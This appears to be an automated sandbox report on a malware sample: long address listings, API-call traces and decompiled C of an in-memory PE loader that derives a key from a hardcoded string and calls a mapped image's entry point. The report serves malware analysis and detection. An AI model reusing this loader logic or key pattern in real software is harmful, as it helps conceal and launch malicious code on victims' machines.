                                          0x006c2e2c
                                          0x006c2e34
                                          0x006c2e3f
                                          0x006c2e4a
                                          0x006c2e55
                                          0x006c2e5d
                                          0x006c2e68
                                          0x006c2e73
                                          0x006c2e7e
                                          0x006c2e89
                                          0x006c2e94
                                          0x006c2e9f
                                          0x006c2eac
                                          0x006c2eb7
                                          0x006c2ec2
                                          0x006c2ecd
                                          0x006c2ed8
                                          0x006c2ee3
                                          0x006c2eee
                                          0x006c2ef9
                                          0x006c2f01
                                          0x006c2f0c
                                          0x006c2f17
                                          0x006c2f2c
                                          0x006c2f2f
                                          0x006c2f30
                                          0x006c2f37
                                          0x006c2f42
                                          0x006c2f4d
                                          0x006c2f58
                                          0x006c2f6e
                                          0x006c2f75
                                          0x006c2f80
                                          0x006c2f8b
                                          0x006c2f96
                                          0x006c2fa1
                                          0x006c2fac
                                          0x006c2fb7
                                          0x006c2fbf
                                          0x006c2fca
                                          0x006c2fd2
                                          0x006c2fda
                                          0x006c2fdf
                                          0x006c2fe7
                                          0x006c2fef
                                          0x006c2ffa
                                          0x006c3005
                                          0x006c3010
                                          0x006c3025
                                          0x006c302c
                                          0x006c3037
                                          0x006c3042
                                          0x006c304d
                                          0x006c3058
                                          0x006c3063
                                          0x006c3076
                                          0x006c307d
                                          0x006c3088
                                          0x006c3093
                                          0x006c309e
                                          0x006c30a9
                                          0x006c30b4
                                          0x006c30c6
                                          0x006c30c9
                                          0x006c30d0
                                          0x006c30db
                                          0x006c30e6
                                          0x006c30f3
                                          0x006c30f7
                                          0x006c30ff
                                          0x006c3104
                                          0x006c310c
                                          0x006c3117
                                          0x006c3122
                                          0x006c312d
                                          0x006c3138
                                          0x006c314b
                                          0x006c3154
                                          0x006c315f
                                          0x006c3167
                                          0x006c316f
                                          0x006c3177
                                          0x006c317c
                                          0x006c3184
                                          0x006c3192
                                          0x006c3197
                                          0x006c31a1
                                          0x006c31a4
                                          0x006c31ad
                                          0x006c31b1
                                          0x006c31b9
                                          0x006c31cc
                                          0x006c31d3
                                          0x006c31de
                                          0x006c31e9
                                          0x006c31f4
                                          0x006c31ff
                                          0x006c3207
                                          0x006c3212
                                          0x006c321d
                                          0x006c3228
                                          0x006c3230
                                          0x006c323b
                                          0x006c3246
                                          0x006c3251
                                          0x006c325c
                                          0x006c3267
                                          0x006c3272
                                          0x006c327a
                                          0x006c3285
                                          0x006c3290
                                          0x006c3298
                                          0x006c32a3
                                          0x006c32ab
                                          0x006c32b6
                                          0x006c32c1
                                          0x006c32c9
                                          0x006c32d4
                                          0x006c32df
                                          0x006c32ea
                                          0x006c32f5
                                          0x006c3300
                                          0x006c330b
                                          0x006c3316
                                          0x006c331e
                                          0x006c3329
                                          0x006c3334
                                          0x006c3347
                                          0x006c334e
                                          0x006c3359
                                          0x006c3364
                                          0x006c336f
                                          0x006c337a
                                          0x006c3385
                                          0x006c3390
                                          0x006c339b
                                          0x006c33a6
                                          0x006c33ae
                                          0x006c33b9
                                          0x006c33c1
                                          0x006c33ce
                                          0x006c33d2
                                          0x006c33da
                                          0x006c33e2
                                          0x006c33ed
                                          0x006c33f5
                                          0x006c3402
                                          0x006c340d
                                          0x006c3418
                                          0x006c3423
                                          0x006c342e
                                          0x006c3439
                                          0x006c3444
                                          0x006c344f
                                          0x006c3457
                                          0x006c3465
                                          0x006c346a
                                          0x006c3470
                                          0x006c3474
                                          0x006c347c
                                          0x006c3487
                                          0x006c3492
                                          0x006c349d
                                          0x006c34a8
                                          0x006c34b3
                                          0x006c34bb
                                          0x006c34c3
                                          0x006c34c8
                                          0x006c34d0
                                          0x006c34db
                                          0x006c34e6
                                          0x006c34f1
                                          0x006c34fc
                                          0x006c350e
                                          0x006c3513
                                          0x006c351c
                                          0x006c3527
                                          0x006c3532
                                          0x006c353d
                                          0x006c3548
                                          0x006c3550
                                          0x006c355b
                                          0x006c3566
                                          0x006c3571
                                          0x006c357c
                                          0x006c3587
                                          0x006c358f
                                          0x006c359a
                                          0x006c35a2
                                          0x006c35af
                                          0x006c35b0
                                          0x006c35b4
                                          0x006c35bc
                                          0x006c35c4
                                          0x006c35cf
                                          0x006c35da
                                          0x006c35e5
                                          0x006c35f0
                                          0x006c35fb
                                          0x006c3606
                                          0x006c3611
                                          0x006c3619
                                          0x006c361e
                                          0x006c3626
                                          0x006c362b
                                          0x006c3633
                                          0x006c3647
                                          0x006c364e
                                          0x006c3656
                                          0x006c3661
                                          0x006c3669
                                          0x006c3679
                                          0x006c367e
                                          0x006c3684
                                          0x006c368c
                                          0x006c3699
                                          0x006c369c
                                          0x006c36a0
                                          0x006c36a8
                                          0x006c36b0
                                          0x006c36b8
                                          0x006c36c3
                                          0x006c36ce
                                          0x006c36d9
                                          0x006c36e4
                                          0x006c36ef
                                          0x006c36f7
                                          0x006c3702
                                          0x006c370d
                                          0x006c3723
                                          0x006c372a
                                          0x006c3735
                                          0x006c3740
                                          0x006c374d
                                          0x006c3750
                                          0x006c375c
                                          0x006c3760
                                          0x006c3765
                                          0x006c376d
                                          0x006c3778
                                          0x006c3780
                                          0x006c378b
                                          0x006c379e
                                          0x006c379f
                                          0x006c37a6
                                          0x006c37ae
                                          0x006c37b9
                                          0x006c37c1
                                          0x006c37c6
                                          0x006c37cb
                                          0x006c37d0
                                          0x006c37d8
                                          0x006c37e3
                                          0x006c37f6
                                          0x006c37fd
                                          0x006c3808
                                          0x006c3810
                                          0x006c3818
                                          0x006c381d
                                          0x006c3822
                                          0x006c382a
                                          0x006c383d
                                          0x006c384d
                                          0x006c3854
                                          0x006c385f
                                          0x006c386a
                                          0x006c3875
                                          0x006c387d
                                          0x006c3888
                                          0x006c3890
                                          0x006c389d
                                          0x006c38a1
                                          0x006c38a9
                                          0x006c38b3
                                          0x006c38be
                                          0x006c38c9
                                          0x006c38d1
                                          0x006c38dc
                                          0x006c38e4
                                          0x006c38e9
                                          0x006c38f1
                                          0x006c38f9
                                          0x006c3901
                                          0x006c390c
                                          0x006c3917
                                          0x006c3922
                                          0x006c392d
                                          0x006c3938
                                          0x006c3940
                                          0x006c394b
                                          0x006c3953
                                          0x006c3958
                                          0x006c3960
                                          0x006c3965
                                          0x006c396d
                                          0x006c3978
                                          0x006c3980
                                          0x006c398b
                                          0x006c3993
                                          0x006c399b
                                          0x006c39a9
                                          0x006c39ae
                                          0x006c39b4
                                          0x006c39bc
                                          0x006c39c4
                                          0x006c39c9
                                          0x006c39d1
                                          0x006c39d9
                                          0x006c39e1
                                          0x006c39f4
                                          0x006c39f7
                                          0x006c39fe
                                          0x006c3a09
                                          0x006c3a14
                                          0x006c3a1f
                                          0x006c3a2a
                                          0x006c3a35
                                          0x006c3a3d
                                          0x006c3a48
                                          0x006c3a53
                                          0x006c3a5e
                                          0x006c3a74
                                          0x006c3a82
                                          0x006c3a87
                                          0x006c3a90
                                          0x006c3a9b
                                          0x006c3aa6
                                          0x006c3ab1
                                          0x006c3abc
                                          0x006c3ac8
                                          0x006c3acb
                                          0x006c3acf
                                          0x006c3adc
                                          0x006c3ae0
                                          0x006c3ae8
                                          0x006c3b00
                                          0x006c3b09
                                          0x006c3b14
                                          0x006c3b1f
                                          0x006c3b2a
                                          0x006c3b35
                                          0x006c3b40
                                          0x006c3b53
                                          0x006c3b54
                                          0x006c3b5b
                                          0x006c3b63
                                          0x006c3b6e
                                          0x006c3b81
                                          0x006c3b90
                                          0x006c3b97
                                          0x006c3ba2
                                          0x006c3bad
                                          0x006c3bc1
                                          0x006c3bd0
                                          0x006c3bd7
                                          0x006c3be2
                                          0x006c3bef
                                          0x006c3bf3
                                          0x006c3bfd
                                          0x006c3c01
                                          0x006c3c09
                                          0x006c3c11
                                          0x006c3c16
                                          0x006c3c1e
                                          0x006c3c26
                                          0x006c3c2e
                                          0x006c3c41
                                          0x006c3c48
                                          0x006c3c53
                                          0x006c3c5e
                                          0x006c3c69
                                          0x006c3c71
                                          0x006c3c79
                                          0x006c3c7e
                                          0x006c3c86
                                          0x006c3c8e
                                          0x006c3c99
                                          0x006c3ca4
                                          0x006c3caf
                                          0x006c3cba
                                          0x006c3cc5
                                          0x006c3ccd
                                          0x006c3cd8
                                          0x006c3ce3
                                          0x006c3ceb
                                          0x006c3cf6
                                          0x006c3d01
                                          0x006c3d14
                                          0x006c3d23
                                          0x006c3d2a
                                          0x006c3d32
                                          0x006c3d3d
                                          0x006c3d48
                                          0x006c3d50
                                          0x006c3d5b
                                          0x006c3d66
                                          0x006c3d6e
                                          0x006c3d7b
                                          0x006c3d8f
                                          0x006c3d9b
                                          0x006c3da2
                                          0x006c3dad
                                          0x006c3db8
                                          0x006c3dc3
                                          0x006c3dce
                                          0x006c3dd9
                                          0x006c3de4
                                          0x006c3df9
                                          0x006c3e01
                                          0x006c3e08
                                          0x006c3e13
                                          0x006c3e2a
                                          0x006c3e2e
                                          0x006c3e36
                                          0x006c3e3b
                                          0x006c3e43
                                          0x006c3e56
                                          0x006c3e65
                                          0x006c3e6c
                                          0x006c3e77
                                          0x006c3e7f
                                          0x006c3e87
                                          0x006c3e8f
                                          0x006c3e97
                                          0x006c3e9f
                                          0x006c3eaa
                                          0x006c3eb2
                                          0x006c3ec6
                                          0x006c3ecd
                                          0x006c3ed8
                                          0x006c3ee3
                                          0x006c3ef6
                                          0x006c3efd
                                          0x006c3f08
                                          0x006c3f08
                                          0x006c3f0d
                                          0x006c3f0d
                                          0x006c3f0d
                                          0x006c3f0d
                                          0x006c3f13
                                          0x006c3f13
                                          0x006c3f19
                                          0x006c3f19
                                          0x006c4295
                                          0x006c4297
                                          0x006c42cb
                                          0x006c42d4
                                          0x006c42dc
                                          0x006c3f0d
                                          0x006c3f0d
                                          0x006c3f0d
                                          0x006c3f13
                                          0x006c3f13
                                          0x00000000
                                          0x006c3f13
                                          0x006c3f0d
                                          0x006c42a7
                                          0x006c42b0
                                          0x006c42b2
                                          0x006c411e
                                          0x006c411e
                                          0x006c3f0d
                                          0x006c3f0d
                                          0x006c3f0d
                                          0x006c3f13
                                          0x006c3f13
                                          0x00000000
                                          0x006c3f13
                                          0x00000000
                                          0x006c3f0d
                                          0x006c3f1f
                                          0x006c3f25
                                          0x006c4129
                                          0x006c412f
                                          0x006c41a9
                                          0x006c41af
                                          0x006c4278
                                          0x006c427f
                                          0x00000000
                                          0x006c427f
                                          0x006c41b5
                                          0x006c41bb
                                          0x006c424e
                                          0x006c4255
                                          0x00000000
                                          0x006c4255
                                          0x006c41bd
                                          0x006c41c3
                                          0x006c4214
                                          0x006c421f
                                          0x006c4227
                                          0x00000000
                                          0x006c4227
                                          0x006c41c5
                                          0x006c41cb
                                          0x00000000
                                          0x00000000
                                          0x006c41df
                                          0x006c41e8
                                          0x006c41f0
                                          0x00000000
                                          0x006c41f0
                                          0x006c4131
                                          0x006c4837
                                          0x006c4851
                                          0x006c4858
                                          0x006c4858
                                          0x006c4137
                                          0x006c413d
                                          0x006c419a
                                          0x006c419f
                                          0x00000000
                                          0x006c419f
                                          0x006c413f
                                          0x006c4145
                                          0x006c4184
                                          0x006c4189
                                          0x00000000
                                          0x006c4189
                                          0x006c4147
                                          0x006c414d
                                          0x006c416c
                                          0x00000000
                                          0x006c416c
                                          0x006c414f
                                          0x006c4155
                                          0x00000000
                                          0x00000000
                                          0x006c4162
                                          0x00000000
                                          0x006c4162
                                          0x006c3f2b
                                          0x006c410d
                                          0x006c4116
                                          0x006c4118
                                          0x006c4118
                                          0x00000000
                                          0x006c4118
                                          0x006c3f31
                                          0x006c3f37
                                          0x006c3ffd
                                          0x006c4003
                                          0x006c40ea
                                          0x006c40f5
                                          0x006c40fc
                                          0x00000000
                                          0x006c40fc
                                          0x006c4009
                                          0x006c400f
                                          0x006c40c9
                                          0x006c40ce
                                          0x006c40d5
                                          0x00000000
                                          0x006c40d5
                                          0x006c4015
                                          0x006c401b
                                          0x006c405c
                                          0x006c4069
                                          0x006c4074
                                          0x006c4079
                                          0x006c407c
                                          0x006c407e
                                          0x006c40b4
                                          0x006c40b4
                                          0x00000000
                                          0x006c40b4
                                          0x006c4080
                                          0x006c4096
                                          0x006c409d
                                          0x006c40a3
                                          0x006c40aa
                                          0x00000000
                                          0x006c40aa
                                          0x006c401d
                                          0x006c4023
                                          0x00000000
                                          0x00000000
                                          0x006c4034
                                          0x006c4042
                                          0x006c404b
                                          0x006c404b
                                          0x00000000
                                          0x006c404b
                                          0x006c3f3d
                                          0x006c3fee
                                          0x006c3ff3
                                          0x00000000
                                          0x006c3ff3
                                          0x006c3f49
                                          0x006c3fdd
                                          0x00000000
                                          0x006c3fdd
                                          0x006c3f55
                                          0x006c3fc7
                                          0x006c3fcc
                                          0x006c3fd3
                                          0x00000000
                                          0x006c3fd3
                                          0x006c3f5d
                                          0x006c3faf
                                          0x00000000
                                          0x006c3faf
                                          0x006c3f65
                                          0x006c3f98
                                          0x006c3f9d
                                          0x006c3f9f
                                          0x00000000
                                          0x006c3fa5
                                          0x006c3fa5
                                          0x00000000
                                          0x006c3fa5
                                          0x006c3f9f
                                          0x006c3f6d
                                          0x00000000
                                          0x006c3f73
                                          0x006c3f81
                                          0x006c3f86
                                          0x00000000
                                          0x006c3f86
                                          0x006c42e7
                                          0x006c42e7
                                          0x006c42ed
                                          0x006c4632
                                          0x006c4638
                                          0x006c4736
                                          0x006c473c
                                          0x006c4818
                                          0x006c481d
                                          0x00000000
                                          0x006c481d
                                          0x006c4742
                                          0x006c4748
                                          0x006c47b9
                                          0x006c47dc
                                          0x006c47e1
                                          0x006c47f2
                                          0x006c4800
                                          0x006c4807
                                          0x00000000
                                          0x006c4807
                                          0x006c474a
                                          0x006c4750
                                          0x006c4778
                                          0x006c4783
                                          0x00000000
                                          0x006c4783
                                          0x006c4752
                                          0x006c4758
                                          0x00000000
                                          0x00000000
                                          0x006c4769
                                          0x006c476e
                                          0x00000000
                                          0x006c476e
                                          0x006c463e
                                          0x006c471a
                                          0x006c4725
                                          0x006c472c
                                          0x00000000
                                          0x006c472c
                                          0x006c4644
                                          0x006c464a
                                          0x006c46f7
                                          0x006c46fc
                                          0x006c46fe
                                          0x00000000
                                          0x00000000
                                          0x006c4704
                                          0x00000000
                                          0x006c4704
                                          0x006c4650
                                          0x006c4656
                                          0x006c46d2
                                          0x006c46e0
                                          0x00000000
                                          0x006c46e6
                                          0x006c4658
                                          0x006c465e
                                          0x006c468a
                                          0x006c4691
                                          0x006c4697
                                          0x006c4699
                                          0x006c469b
                                          0x006c46a3
                                          0x006c46b3
                                          0x006c46ba
                                          0x006c46ba
                                          0x00000000
                                          0x006c46ba
                                          0x006c4660
                                          0x006c4666
                                          0x00000000
                                          0x00000000
                                          0x006c4670
                                          0x006c4675
                                          0x00000000
                                          0x006c4675
                                          0x006c42f3
                                          0x006c461d
                                          0x006c4628
                                          0x00000000
                                          0x006c4628
                                          0x006c42f9
                                          0x006c42ff
                                          0x006c4463
                                          0x006c4469
                                          0x006c453f
                                          0x006c454d
                                          0x006c4551
                                          0x006c4558
                                          0x006c455f
                                          0x006c4567
                                          0x006c4568
                                          0x006c456d
                                          0x006c4570
                                          0x006c4572
                                          0x006c45c8
                                          0x006c45fb
                                          0x006c4600
                                          0x006c4605
                                          0x006c4610
                                          0x006c4615
                                          0x006c4574
                                          0x006c4578
                                          0x006c45a2
                                          0x006c45a7
                                          0x006c45ac
                                          0x006c45b3
                                          0x006c45b5
                                          0x006c45b7
                                          0x006c45bc
                                          0x006c45bc
                                          0x006c3f08
                                          0x006c3f08
                                          0x00000000
                                          0x006c3f08
                                          0x006c3f08
                                          0x006c446f
                                          0x006c4475
                                          0x006c44f3
                                          0x006c451d
                                          0x006c4522
                                          0x006c4527
                                          0x006c452e
                                          0x006c4530
                                          0x006c4532
                                          0x006c4537
                                          0x00000000
                                          0x006c4537
                                          0x006c4477
                                          0x006c447d
                                          0x006c44d6
                                          0x006c44db
                                          0x006c44e2
                                          0x00000000
                                          0x006c44e2
                                          0x006c447f
                                          0x006c4485
                                          0x00000000
                                          0x00000000
                                          0x006c4499
                                          0x006c44ac
                                          0x006c44b5
                                          0x006c44bd
                                          0x00000000
                                          0x006c44bd
                                          0x006c4305
                                          0x006c43e8
                                          0x006c43e8
                                          0x006c43ea
                                          0x006c441b
                                          0x006c4427
                                          0x006c442e
                                          0x006c4437
                                          0x006c443e
                                          0x006c4440
                                          0x00000000
                                          0x00000000
                                          0x006c444a
                                          0x006c444f
                                          0x006c4451
                                          0x006c4459
                                          0x006c4459
                                          0x00000000
                                          0x006c4459
                                          0x006c4453
                                          0x00000000
                                          0x00000000
                                          0x006c4455
                                          0x006c4457
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x006c4457
                                          0x006c43ec
                                          0x006c43ec
                                          0x00000000
                                          0x006c43ec
                                          0x006c430b
                                          0x006c430d
                                          0x006c484c
                                          0x00000000
                                          0x006c484c
                                          0x006c4313
                                          0x006c4319
                                          0x006c43c3
                                          0x006c43c8
                                          0x006c43ca
                                          0x00000000
                                          0x00000000
                                          0x006c43d7
                                          0x006c43dc
                                          0x00000000
                                          0x006c43dc
                                          0x006c431f
                                          0x006c4325
                                          0x006c436c
                                          0x006c4377
                                          0x006c437e
                                          0x006c4380
                                          0x00000000
                                          0x00000000
                                          0x006c4394
                                          0x006c4399
                                          0x006c43a1
                                          0x006c43a6
                                          0x006c43ac
                                          0x006c43b4
                                          0x006c43b4
                                          0x00000000
                                          0x006c43a6
                                          0x006c4327
                                          0x006c432d
                                          0x00000000
                                          0x00000000
                                          0x006c433e
                                          0x006c434c
                                          0x006c4353
                                          0x006c4353
                                          0x006c4822
                                          0x006c4822
                                          0x00000000
                                          0x006c482e

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: );$+!$,Bb*$0vkX$71##$71##$71##$71##$7Y$;R,]$=<$C!)$D'k.$D'k.$D>$DP$FM$G"$I]$P&$QG)}$T5W$[ $\$$bY$c$d3$jd$kU$nY$n\$nlvJ$ny$o4-($o4-($o$yI$}%$~$=$q$u$k
                                          • API String ID: 0-1872862241
                                          • Opcode ID: 35460db229f013b07498c6a2ea2d1cb8cfc7a8041456666d7e773644db25afa7
                                          • Instruction ID: efa72adc63340668150a72e874c902c021041a1c228a22148b30d97ec8afb706
                                          • Opcode Fuzzy Hash: 35460db229f013b07498c6a2ea2d1cb8cfc7a8041456666d7e773644db25afa7
                                          • Instruction Fuzzy Hash: 87D2F4715093818BD378CF25C59ABEFBBE2FB84314F10891DE19A862A0DBB49945CF47
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 100011C0, Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 177encryptionmemorylibraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000,00000009,00003000,00000004), ref: 1000120D
                                          • GetModuleHandleExA.KERNEL32(00000000,00000000,00000000), ref: 1000122B
                                          • VirtualAlloc.KERNELBASE(00000000,00000011,00003000,00000004,00000000,00000000,00000000), ref: 1000123F
                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000126E
                                          • VirtualAlloc.KERNELBASE(00000000,00000011,00003000,00000004), ref: 10001280
                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 100012A9
                                            • Part of subcall function 10001A10: SetLastError.KERNEL32(0000007F), ref: 10001A29
                                          • LdrFindResource_U.NTDLL(10000000,00000007,00000000), ref: 100012CB
                                          • LdrAccessResource.NTDLL(10000000,?,00000000,00000000), ref: 100012E5
                                          • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,00000000), ref: 100012FD
                                          • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,00000008), ref: 1000130D
                                          • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 10001320
                                          • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 1000133A
                                          • CryptHashData.ADVAPI32(?,jTrg_bayw(W_SKQ*r#4fn<hsXa9Af2plu065YZ7pLx,0000002A,00000001), ref: 10001354
                                          • CryptDeriveKey.ADVAPI32(?,00006801,?,00000001,?), ref: 1000136F
                                          • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000000), ref: 10001391
                                          • _memmove.LIBCMT ref: 1000139C
                                          • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 100013B5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp Download File
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Crypt$AllocVirtual$AcquireContext$AddressHashProc$AccessCreateDataDeriveEncryptErrorFindHandleLastModuleResourceResource__memmove
                                          • String ID: Control_RunDLL$LdrAccessResource$LdrFindResource_U$jTrg_bayw(W_SKQ*r#4fn<hsXa9Af2plu065YZ7pLx$ntdll.dll
                                          • API String ID: 2007481169-3150289311
                                          • Opcode ID: ab3823a83ee01bd1bc3d7bea12b07bca12ff485c0a35c74fc16e9d1a63149cf3
                                          • Instruction ID: a3675f4d503a69c22f59064f11fbc194b2fe3a8f938d4bec1e3a9f9fa3db5d27
                                          • Opcode Fuzzy Hash: ab3823a83ee01bd1bc3d7bea12b07bca12ff485c0a35c74fc16e9d1a63149cf3
                                          • Instruction Fuzzy Hash: 71515071940219BAFB11EBA1CC45FEEBBB8EF19780F014156F604B61E4EBB1A545CB70
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 10001B30, Relevance: 18.3, APIs: 12, Instructions: 256COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 90%
                                          			E10001B30(intOrPtr __ecx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v44;
				char _v48;
				signed int _t67;
				void* _t72;
				long _t74;
				void* _t86;
				void* _t89;
				void* _t90;
				void* _t95;
				intOrPtr _t98;
				intOrPtr* _t100;
				void* _t109;
				intOrPtr _t111;
				void* _t112;
				intOrPtr _t113;
				void* _t114;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t118;
				intOrPtr* _t128;
				intOrPtr* _t129;
				signed int _t131;
				intOrPtr _t133;
				signed int _t135;
				long _t138;
				long _t139;
				void* _t147;
				void* _t148;
				void* _t149;
				void* _t150;

				_t113 = _a8;
				_t147 = 0;
				_v8 = __ecx;
				if(_t113 >= 0x40) {
					_t129 = _a4;
					if( *_t129 == 0x5a4d) {
						_t117 =  *((intOrPtr*)(_t129 + 0x3c));
						if(_t113 < _t117 + 0xf8) {
							goto L1;
						} else {
							_t114 = _t117 + _t129;
							if( *((intOrPtr*)(_t117 + _t129)) != 0x4550 ||  *((intOrPtr*)(_t114 + 4)) != 0x14c || ( *(_t114 + 0x38) & 0x00000001) != 0) {
								goto L3;
							} else {
								_t12 = _t114 + 0x14; // 0xc033cd33
								_t67 =  *_t12 & 0x0000ffff;
								_t13 = _t114 + 6; // 0xe8ef4d8d
								_t135 =  *_t13 & 0x0000ffff;
								if(_t135 != 0) {
									_t14 = _t114 + 0x24; // 0x100013ef
									_t128 = _t14 + _t67;
									do {
										_t15 = _t128 + 4; // 0x12f7805
										_t133 =  *_t15;
										_t111 =  *_t128;
										if(_t133 != 0) {
											_t112 = _t111 + _t133;
										} else {
											_t16 = _t114 + 0x38; // 0xff1075ff
											_t112 = _t111 +  *_t16;
										}
										_t147 =  >  ? _t112 : _t147;
										_t128 = _t128 + 0x28;
										_t135 = _t135 - 1;
									} while (_t135 != 0);
								}
								_push( &_v48); // executed
								L100037FA(); // executed
								_t118 = _v44;
								_t19 = _t118 - 1; // -1
								_t20 = _t114 + 0x50; // 0xcc25d
								_t21 = _t118 - 1; // -1
								_t22 = _t118 - 1; // -1
								_t131 =  !_t21;
								_t138 = _t19 +  *_t20 & _t131;
								if(_t138 == (_t22 + _t147 & _t131)) {
									_t23 = _t114 + 0x34; // 0xec8b55cc, executed
									_t72 = VirtualAlloc( *_t23, _t138, 0x3000, 4); // executed
									_t148 = _t72;
									_v12 = _t148;
									if(_t148 != 0) {
										L18:
										_t74 = HeapAlloc(GetProcessHeap(), 8, 0x34);
										_t139 = _t74;
										if(_t139 != 0) {
											 *(_t139 + 4) = _t148;
											_t27 = _t114 + 0x16; // 0xe85ec033
											 *(_t139 + 0x14) = ( *_t27 & 0x0000ffff) >> 0x0000000d & 0x00000001;
											 *((intOrPtr*)(_t139 + 0x1c)) = _a12;
											 *((intOrPtr*)(_t139 + 0x20)) = _a16;
											 *((intOrPtr*)(_t139 + 0x24)) = _a20;
											 *((intOrPtr*)(_t139 + 0x28)) = _a24;
											 *((intOrPtr*)(_t139 + 0x30)) = _v44;
											_t40 = _t114 + 0x54; // 0xec8b55cc
											if(E100015F0(_a8,  *_t40) == 0) {
												L36:
												_t115 = _v8;
												goto L37;
											} else {
												_t42 = _t114 + 0x54; // 0xec8b55cc
												_t86 = VirtualAlloc(_t148,  *_t42, 0x1000, 4);
												_t43 = _t114 + 0x54; // 0xec8b55cc
												_t149 = _t86;
												E10001F40(_t149, _a4,  *_t43);
												_t89 =  *((intOrPtr*)(_a4 + 0x3c)) + _t149;
												_t150 = _v12;
												 *_t139 = _t89;
												 *((intOrPtr*)(_t89 + 0x34)) = _t150;
												_t90 = E10001620(_a4, _a8, _t114, _t139); // executed
												if(_t90 == 0) {
													goto L36;
												} else {
													_t52 = _t114 + 0x34; // 0xec8b55cc
													_t93 =  *((intOrPtr*)( *_t139 + 0x34)) ==  *_t52;
													_t115 = _v8;
													if( *((intOrPtr*)( *_t139 + 0x34)) ==  *_t52) {
														 *((intOrPtr*)(_t139 + 0x18)) = 1;
													} else {
														 *((intOrPtr*)(_t139 + 0x18)) = E10001E90(_t139, _t93);
													}
													if(E10001470(_t115, _t139) == 0) {
														L37:
														E10001980(_t139);
														return 0;
													} else {
														_t95 = E10001830(_t115, _t139); // executed
														if(_t95 == 0 || E10001730(_t139) == 0) {
															goto L37;
														} else {
															_t98 =  *((intOrPtr*)( *_t139 + 0x28));
															if(_t98 == 0) {
																 *((intOrPtr*)(_t139 + 0x2c)) = 0;
																return _t139;
															} else {
																_t100 = _t98 + _t150;
																if( *(_t139 + 0x14) == 0) {
																	 *((intOrPtr*)(_t139 + 0x2c)) = _t100;
																	return _t139;
																} else {
																	_push(0);
																	_push(1);
																	_push(0x10000000);
																	if( *_t100() != 0) {
																		 *((intOrPtr*)(_t139 + 0x10)) = 1;
																		return _t139;
																	} else {
																		SetLastError(0x45a);
																		E10001980(_t139);
																		return 0;
																	}
																}
															}
														}
													}
												}
											}
										} else {
											VirtualFree(_t148, _t74, 0x8000);
											goto L20;
										}
									} else {
										_t109 = VirtualAlloc(_t72, _t138, 0x3000, 4); // executed
										_t148 = _t109;
										_v12 = _t109;
										if(_t148 == 0) {
											L20:
											SetLastError(0xe);
											return 0;
										} else {
											goto L18;
										}
									}
								} else {
									SetLastError(0xc1);
									return 0;
								}
							}
						}
					} else {
						L3:
						SetLastError(0xc1);
						return 0;
					}
				} else {
					L1:
					SetLastError(0xd);
					return 0;
				}
			}



































                                          0x10001b37
                                          0x10001b3b
                                          0x10001b3d
                                          0x10001b43
                                          0x10001b57
                                          0x10001b62
                                          0x10001b79
                                          0x10001b84
                                          0x00000000
                                          0x10001b86
                                          0x10001b8d
                                          0x10001b90
                                          0x00000000
                                          0x10001ba3
                                          0x10001ba3
                                          0x10001ba3
                                          0x10001ba8
                                          0x10001ba8
                                          0x10001bae
                                          0x10001bb0
                                          0x10001bb3
                                          0x10001bb5
                                          0x10001bb5
                                          0x10001bb5
                                          0x10001bb8
                                          0x10001bbc
                                          0x10001bc3
                                          0x10001bbe
                                          0x10001bbe
                                          0x10001bbe
                                          0x10001bbe
                                          0x10001bc7
                                          0x10001bca
                                          0x10001bcd
                                          0x10001bcd
                                          0x10001bb5
                                          0x10001bd3
                                          0x10001bd4
                                          0x10001bd9
                                          0x10001bdc
                                          0x10001bdf
                                          0x10001be2
                                          0x10001be5
                                          0x10001be8
                                          0x10001bec
                                          0x10001bf2
                                          0x10001c12
                                          0x10001c15
                                          0x10001c1b
                                          0x10001c1d
                                          0x10001c22
                                          0x10001c3c
                                          0x10001c47
                                          0x10001c4d
                                          0x10001c51
                                          0x10001c73
                                          0x10001c76
                                          0x10001c83
                                          0x10001c89
                                          0x10001c8f
                                          0x10001c95
                                          0x10001c9b
                                          0x10001ca1
                                          0x10001ca4
                                          0x10001cb1
                                          0x10001db9
                                          0x10001db9
                                          0x00000000
                                          0x10001cb7
                                          0x10001cbe
                                          0x10001cc2
                                          0x10001cc8
                                          0x10001ccb
                                          0x10001cd1
                                          0x10001ce2
                                          0x10001ce4
                                          0x10001cec
                                          0x10001cef
                                          0x10001cf2
                                          0x10001cf9
                                          0x00000000
                                          0x10001cff
                                          0x10001d04
                                          0x10001d04
                                          0x10001d07
                                          0x10001d0a
                                          0x10001d1a
                                          0x10001d0c
                                          0x10001d15
                                          0x10001d15
                                          0x10001d2b
                                          0x10001dbc
                                          0x10001dbf
